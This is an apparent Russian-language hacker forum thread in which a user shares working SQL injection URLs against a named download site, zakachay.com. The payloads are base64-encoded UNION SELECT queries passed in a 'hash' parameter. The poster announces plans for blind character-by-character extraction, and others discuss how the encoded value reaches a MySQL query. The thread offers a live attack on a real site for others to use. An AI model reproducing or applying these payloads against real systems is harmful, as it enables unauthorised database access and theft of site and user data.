Я тут потихонечку ищу новые реализации sql иньекций...
Нашел довольно забавный движок...
Очень порадовало вообщем :)

Рабочая иньекция.
http://www.zakachay.com/?action=regconf&hash=MTonLyoqL3VuaW9uLyoqL3NlbGVjdC8qKi8xLDIsdXNlc igpLDQsNSw2LDcsOCw5LDEvKjox

Не рабочая
http://www.zakachay.com/?action=regconf&hash=MTonLyoqL3VuaW9uLyoqL3NlbGVjdC8qKi8xLDIsbG9sZ WcsNCw1LDYsNyw4LDksMS8qOjE

Реализовать можно только посимвольный перебор чем щас и займусь :)

Разбирайтесь :)

Круто, тока я не врубаюсь, что там не даёт использовать функцию user()?

2Termin@L
:) ыыыыыы

Я чтото не пойму вчем суть этой sql inj? Там параметры шыфруются и чтоли?

кодируються

Для чего они воще кодируются?

base64 зашифрованный пароль, который, декодируется, и после этого вставляется в mysql запрос, я так понял служит, кк авторизация. А [cash] просто зашифровал в бэйс64, запрос с union, и всё
2 [cash] ну дак почему, ни хъя не получается, сори если туплю, вечер как никак...